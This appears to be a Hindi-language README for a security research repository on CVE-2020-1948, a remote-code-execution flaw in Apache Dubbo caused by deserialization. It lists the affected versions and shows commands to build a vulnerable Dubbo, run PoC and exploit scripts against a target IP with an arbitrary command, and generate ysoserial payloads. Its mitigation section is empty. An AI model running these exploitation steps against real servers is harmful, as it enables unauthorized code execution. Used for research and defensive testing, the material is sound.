
[CVE-2020-1948] Apache Dubbo Provider डिफ़ॉल्ट डिसीरियलाइज़ेशन RCE का कारण बनता है
इस रिपॉजिटरी में Apache Dubbo डिसीरियलाइज़ेशन भेद्यताओं से संबंधित अनुसंधान सामग्री, प्रूफ-ऑफ-कॉन्सेप्ट कोड और शोषण उपकरण शामिल हैं, मुख्य रूप से CVE-2020-1948 पर केंद्रित।
Apache Dubbo के संस्करण 2.7.8, 2.6.9 और 2.5.10 से पहले के संस्करण असुरक्षित डिसीरियलाइज़ेशन के कारण रिमोट कोड निष्पादन हमले (CVE-2020-1948) के प्रति संवेदनशील हैं। यह भेद्यता डब्बो प्रदाता घटक को प्रभावित करती है, जो उचित सत्यापन के बिना जावा मूल क्रमबद्धता का उपयोग करता है।
इस भेद्यता का शोषण कई वैक्टरों के माध्यम से किया जा सकता है:
# एक संवेदनशील डब्बो संस्करण क्लोन और बनाएँ
cd dubbo-dubbo-2.7.5
mvn clean package
# प्रूफ ऑफ कॉन्सेप्ट चलाएँ
python dubboPoc.py -t <target_ip> -p <target_port>
# शोषण चलाएँ
python dubboExp.py -t <target_ip> -p <target_port> -c "command_to_execute"
आप कस्टम पेलोड उत्पन्न करने के लिए ysoserial.jar का उपयोग कर सकते हैं:
java -jar ysoserial.jar CommonsCollections1 "command_to_execute" > payload.ser
इन भेद्यताओं से बचाव के लिए:
यह रिपॉजिटरी केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। प्रदान किए गए कोड और उपकरणों का उपयोग केवल उन सिस्टमों के खिलाफ किया जाना चाहिए जिनका परीक्षण करने की अनुमति आपके पास है। इस जानकारी के किसी भी दुरुपयोग के लिए रिपॉजिटरी स्वामी जिम्मेदार नहीं है।